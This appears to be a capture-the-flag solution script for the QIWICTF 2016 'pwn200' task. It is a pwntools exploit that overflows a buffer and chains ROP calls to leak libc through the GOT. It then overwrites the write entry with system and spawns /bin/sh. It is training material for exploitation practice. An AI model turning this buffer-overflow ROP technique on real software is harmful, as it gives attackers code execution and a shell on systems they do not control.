QIWICTF 2016 pwn200
2019. 1. 23. 13:49
from pwn import *

# Spawn the task binary and load it for symbol lookup.
r = process("./task_3")
elf = ELF("./task_3")

# Everything below comes from the binary itself: PLT stubs for read/write,
# the GOT slot of write, a fixed pop;pop;pop;ret gadget (used to discard the
# three call arguments), and the start of .bss as writable scratch space.
read_plt = elf.plt['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
pppr = 0x0804855d
bss = elf.bss()
binsh = "/bin/sh\x00"


def call3(fn, a0, a1, a2):
    # One ROP frame: callee, gadget that pops the three args, then the args.
    return p32(fn) + p32(pppr) + p32(a0) + p32(a1) + p32(a2)


chain = [
    "\x90" * 140,                       # filler before the chain proper
    call3(write_plt, 1, write_got, 6),  # write(1, &write@got, 6): send the GOT entry back to us
    call3(read_plt, 0, write_got, 4),   # read(0, &write@got, 4): accept 4 bytes into the GOT slot
    call3(read_plt, 0, bss, 8),         # read(0, bss, 8): accept 8 bytes into .bss
    p32(write_plt),                     # call through write@plt once more
    "\x90" * 4,                         # return address for that call (never reached)
    p32(bss),                           # its first argument
]
payload = "".join(chain)
r.sendline(payload)

# The first frame echoes write's resolved address; the script then derives
# system from it using a constant specific to the task's libc build.
libc_write = u32(r.recv(4))
libc_system = libc_write - 0x9add0
log.info("libc_write = {}".format(hex(libc_write)))
log.info("libc_system = {}".format(hex(libc_system)))

# Feed the two pending read() frames: 4 bytes for the GOT slot, 8 for .bss.
r.send(p32(libc_system))
r.send(binsh)
r.interactive()